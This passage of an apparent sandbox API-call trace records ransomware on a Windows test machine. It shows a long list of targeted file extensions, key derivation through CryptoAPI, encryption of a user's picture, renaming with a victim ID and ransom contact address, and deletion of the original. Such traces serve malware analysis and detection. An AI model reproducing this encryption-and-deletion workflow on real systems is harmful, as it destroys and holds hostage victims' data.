x.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.716] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.717] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.717] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.721] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xbf4e, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xbf4e, lpOverlapped=0x0) returned 1
	[0197.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.724] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0197.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.728] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.729] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.730] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9530) returned 1
	[0197.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.730] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xbf4e, dwBufLen=0xbf4e | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xbf50) returned 1
	[0197.731] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.732] RtlMoveMemory (in: Destination=0xfe90d8, Source=0xfdd180, Length=0xbf4e | out: Destination=0xfe90d8) 
	[0197.732] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.732] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe90d8*, pdwDataLen=0x18aefc*=0xbf4e, dwBufLen=0xbf50 | out: pbData=0xfe90d8*, pdwDataLen=0x18aefc*=0xbf50) returned 1
	[0197.735] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.735] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0197.735] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.735] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.735] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.735] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0197.736] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.736] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.736] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.737] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.738] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 107
	[0197.738] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.739] WriteFile (in: hFile=0x388, lpBuffer=0xfe90d8*, nNumberOfBytesToWrite=0xbf50, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe90d8*, lpNumberOfBytesWritten=0x18b358*=0xbf50, lpOverlapped=0x0) returned 1
	[0197.798] CloseHandle (hObject=0x388) returned 1
	[0197.799] CloseHandle (hObject=0x2c0) returned 1
	[0197.799] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg")) returned 1
	[0197.815] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg")) returned 0
	[0197.815] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe98c51d0, ftCreationTime.dwHighDateTime=0x1d96df6, ftLastAccessTime.dwLowDateTime=0x2a4d2d50, ftLastAccessTime.dwHighDateTime=0x1d974d4, ftLastWriteTime.dwLowDateTime=0x2a4d2d50, ftLastWriteTime.dwHighDateTime=0x1d974d4, nFileSizeHigh=0x0, nFileSizeLow=0x1603d, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuwG7C_8dv6TFar.gif", cAlternateFileName="QUWG7C~1.GIF")) returned 1
	[0197.816] lstrcmpW (lpString1="QuwG7C_8dv6TFar.gif", lpString2="..") returned 1
	[0197.816] lstrcmpW (lpString1="QuwG7C_8dv6TFar.gif", lpString2=".") returned 1
	[0197.816] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.816] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="QuwG7C_8dv6TFar.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\QuwG7C_8dv6TFar.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\QuwG7C_8dv6TFar.gif"
	[0197.816] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\QuwG7C_8dv6TFar.gif") returned 63
	[0197.816] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.817] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\QuwG7C_8dv6TFar.gif", cchLength=0x3f | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif") returned 0x3f
	[0197.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.817] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif"
	[0197.817] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif") returned 63
	[0197.817] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.818] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0197.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.818] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.s